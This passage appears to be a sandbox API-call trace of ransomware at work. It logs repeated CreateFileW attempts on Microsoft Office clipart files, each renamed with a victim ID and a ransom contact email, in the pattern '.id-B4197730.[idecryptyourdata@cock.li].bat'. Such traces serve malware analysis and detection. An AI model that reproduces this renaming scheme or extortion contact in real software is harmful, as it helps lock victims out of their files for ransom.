(in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382947.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382947.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.766] CloseHandle (hObject=0x51c) returned 1 [0166.767] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.767] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382948.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382948.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.767] CloseHandle (hObject=0x51c) returned 1 [0166.768] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.768] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382950.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382950.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.768] CloseHandle (hObject=0x51c) returned 1 [0166.769] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.769] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382952.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382952.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.769] CloseHandle (hObject=0x51c) returned 1 [0166.770] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.770] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382954.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382954.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.771] CloseHandle (hObject=0x51c) returned 1 [0166.772] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.772] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382955.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382955.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.772] CloseHandle (hObject=0x51c) returned 1 [0166.774] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.774] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382957.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382957.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.774] CloseHandle (hObject=0x51c) returned 1 [0166.775] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.775] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382958.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382958.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.775] CloseHandle (hObject=0x51c) returned 1 [0166.776] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.776] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382959.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382959.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.776] CloseHandle (hObject=0x51c) returned 1 [0166.778] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.778] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382960.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382960.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.778] CloseHandle (hObject=0x51c) returned 1 [0166.779] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.779] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382961.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382961.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.779] CloseHandle (hObject=0x51c) returned 1 [0166.780] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.780] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382962.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382962.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.780] CloseHandle (hObject=0x51c) returned 1 [0166.781] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.781] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382963.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382963.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.782] CloseHandle (hObject=0x51c) returned 1 [0166.783] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.783] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382965.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382965.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.784] CloseHandle (hObject=0x51c) returned 1 [0166.784] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.785] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382966.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382966.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.785] CloseHandle (hObject=0x51c) returned 1 [0166.786] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.786] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382967.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382967.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.786] CloseHandle (hObject=0x51c) returned 1 [0166.787] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.787] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382968.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382968.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.787] CloseHandle (hObject=0x51c) returned 1 [0166.788] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.788] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382969.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382969.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.788] CloseHandle (hObject=0x51c) returned 1 [0166.790] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.790] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382970.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382970.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.790] CloseHandle (hObject=0x51c) returned 1 [0166.791] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.791] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384862.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384862.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.791] CloseHandle (hObject=0x51c) returned 1 [0166.792] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.792] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384885.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384885.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.792] CloseHandle (hObject=0x51c) returned 1 [0166.793] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.793] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384888.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384888.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.793] CloseHandle (hObject=0x51c) returned 1 [0166.794] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.794] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384895.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384895.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.794] CloseHandle (hObject=0x51c) returned 1 [0167.533] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.533] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384900.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384900.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.655] CloseHandle (hObject=0x42c) returned 1 [0169.958] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.959] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00388_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00388_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.959] CloseHandle (hObject=0x378) returned 1 [0171.103] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.103] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02361_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02361_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.225] CloseHandle (hObject=0x37c) returned 1 [0171.677] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.678] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02373_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02373_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.678] CloseHandle (hObject=0x484) returned 1 [0171.679] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.679] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02450_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02450_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.679] CloseHandle (hObject=0x484) returned 1 [0171.680] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.680] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02451_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02451_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.680] CloseHandle (hObject=0x484) returned 1 [0171.683] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.683] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02453_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02453_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.683] CloseHandle (hObject=0x484) returned 1 [0171.684] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.684] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00013_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00013_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.685] CloseHandle (hObject=0x484) returned 1 [0171.686] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.686] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00014_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00014_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.687] CloseHandle (hObject=0x484) returned 1 [0171.687] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.688] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.688] CreateFileW 